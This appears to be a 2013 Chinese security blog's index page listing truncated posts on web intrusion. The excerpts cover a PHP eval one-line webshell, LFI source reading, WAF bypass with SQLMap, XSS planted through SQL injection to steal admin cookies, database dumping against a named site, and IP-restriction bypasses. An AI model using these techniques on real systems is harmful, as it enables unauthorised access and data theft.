上一页 1 ··· 4 5 6 7 8 9 10 11 12 ··· 30 下一页

2013年10月23日

php://input,php://filter,data URI schema的那些事

摘要: 一、php://input一句话木马在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)@eval(file_get_contents(‘php://input’))我是个十足的php菜鸟,只有用到的时候才会去查查语法书,对php://input也只是有点印象而已,于是用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能1";4//@eval(file_get_contents('php://i 阅读全文

posted @ 2013-10-23 03:22 =_=! 阅读(444) 评论(0) 推荐(0) 编辑

php LFI读php文件源码以及直接post webshell

摘要: 假设如下一个场景(1) http://vulnerable/fileincl/example1.php?page=intro.php(该php文件包含LFI漏洞)(2) 但是你没有地方可以upload你的webshell代码(3) LFI只能读取到非php文件的源码(因为无法解析执行 只能被爆菊花)(4) 如果你能读取到config.php之类文件 或许可以直接拿到数据库账号远程入侵进去【现在的问题是】LFI如何读取到php文件的源码?于是给大家做个演示如果我正常用LFI去读/sqli/db.php文件是无法读取它的源码它会被当做php文件被执行1http://vulnerable/filei 阅读全文

posted @ 2013-10-23 03:19 =_=! 阅读(1478) 评论(0) 推荐(0) 编辑

2013年10月22日

构造 HTTP请求 Header 实现“伪造来源 IP ”

摘要: 在阅读本文前,大家要有一个概念,在实现正常的TCP/IP 双方通信情况下,是无法伪造来源 IP 的,也就是说,在 TCP/IP 协议中,可以伪造数据包来源 IP ,但这会让发送出去的数据包有去无回,无法实现正常的通信。这就像我们给对方写信时,如果写出错误的发信人地址,而收信人按信封上的发信人地址回信时,原发信人是无法收到回信的。 一些DDoS 攻击,如 SYN flood, 就是利用了 TCP/ip 的此缺陷而实现攻击的。《计算机网络》教材一书上,对这种行为定义为“发射出去就不管”。 因此,本文标题中的伪造来源IP 是带引号的。并非是所有 HTTP 应用程序中存在此漏洞。 那么在HTTP 中. 阅读全文

posted @ 2013-10-22 08:57 =_=! 阅读(842) 评论(0) 推荐(0) 编辑

2013年10月7日

RedHat/CentOS发行版本号及内核版本号对照表

摘要: Redhat 9.0———————————————2.4.20-8RHEL 3 Update 8————————————2.4.21-47RHEL 4 ————————————————2.6.9-5RHEL 4 Update 1————————————2.6.9-11RHEL 4 Update 2————————————2.6.9-22RHEL 4 Update 3————————————2.6.9-34RHEL 4 Update 4————————————2.6.9-42RHEL 4 Update 5————————————2.6.9-55RHEL 4 Update 6——————————— 阅读全文

posted @ 2013-10-07 00:54 =_=! 阅读(1814) 评论(0) 推荐(0) 编辑

2013年10月3日

for命令跨目录 读文件 写文件

摘要: /c for /d %i in (D:/VirtualHost/hackqing/www/*) do @echo %i //列目录/c for /r D:/VirtualHost/hackqing/www/ %i in (*.*) do @echo %i //浏览目录/c for /f %c in (D:\VirtualHost\hackqing\www\data.asp) do @echo %c //读取文件/c for /f %c in (D:\VirtualHost\hackqing\www\hackqing.mdb) do @echo %c //读取Access 数据库 for ... 阅读全文

posted @ 2013-10-03 23:41 =_=! 阅读(376) 评论(0) 推荐(0) 编辑

2013年10月1日

抓取google链接的php代码

摘要: .*/im'; preg_match_all($preg, $content, $m); preg_match_all('/(.*?)/', $m[0][0], $ms); $list = array(); foreach ($ms[1] as $link) { preg_match('/http:\/\/[a-zA-Z0-9._-]*/', $link, $matches); ... 阅读全文

posted @ 2013-10-01 22:40 =_=! 阅读(314) 评论(0) 推荐(0) 编辑

2013年9月17日

如何使用SQLMap绕过WAF

摘要: WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可绕过的!本文将向大家讲述,如何使用注入神器SQLMap绕过WAFs/IDSs。svn下载最新版本的sqlmapsvn checkouthttps://svn.sqlmap.org/sqlmap/trunk/sqlmapsqlmap-dev我们关注的重点在于使用tamper脚本修改请求从而逃避WAF的规则检测。许多时候,你需要联合使用多个tamper脚本。所有tamper脚本请参考:https://svn.sqlmap.org/sqlmap/trun 阅读全文

posted @ 2013-09-17 06:50 =_=! 阅读(494) 评论(0) 推荐(0) 编辑

当 sql injection 遇上 xss

摘要: (本文xss 平台地址 http://code.google.com/p/xssing/ )当注入无法获取后台地址和解密不了hash可以用这招,前提是注入点能够 update 或者 insert 数据,直接插入 xss代码(不会有任何过滤) 到后台有可能显示的地方,比如留言 消息 文章等等一个 case:目标站找到个隐蔽的 mssql盲注,但是找不到后台地址win下乱码 换到bt来,找了好久没找到留言板 却找到个极品的地方,这个系统的菜单全部是放在库里面的果断插入菜单第二天起来 成功 收到信息,直接cookie进后台,爆菊xss利用的一个小tips 各种大牛勿喷哈 阅读全文

posted @ 2013-09-17 06:14 =_=! 阅读(187) 评论(0) 推荐(0) 编辑

SQLMAP注入拖库过程

摘要: SQLMAP是一款开源的渗透测试程序,它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。渗透开始-->注入点:"http://so.126disk.com/search?key=A"测试环境:BackTrack5/SQLMAP0.9#>./sqlmap.py-u"http://so.126disk.com/search?key=A"-v1--dbs//列举数据库-->126disk,information_schema# 阅读全文

posted @ 2013-09-17 05:28 =_=! 阅读(1616) 评论(1) 推荐(1) 编辑

2013年8月22日

绕过apache目录IP限制技巧

摘要: 显示不全请点击全屏阅读今天搞一个网站,得到后台.但是打开得到 如下错误.403 ForbiddenRequest forbidden by administrative rules.这情况一般是 没有首页.或者限制IP. 明显后台首先是存在的.因为是ECSHOP的系统,后台index.php不能随意更改..修改的话同时需要修改一大堆调用.不便修改,那么就是IP限制了..http://xxx.es/es/xxxs_admin_manager/这样访问提示但当访问 http://xxx.es/es//xxxs_admin_manager/这样奇迹就发生了因为conf文件是 Options Ind. 阅读全文

posted @ 2013-08-22 21:16 =_=! 阅读(1400) 评论(0) 推荐(0) 编辑

上一页 1 ··· 4 5 6 7 8 9 10 11 12 ··· 30 下一页

导航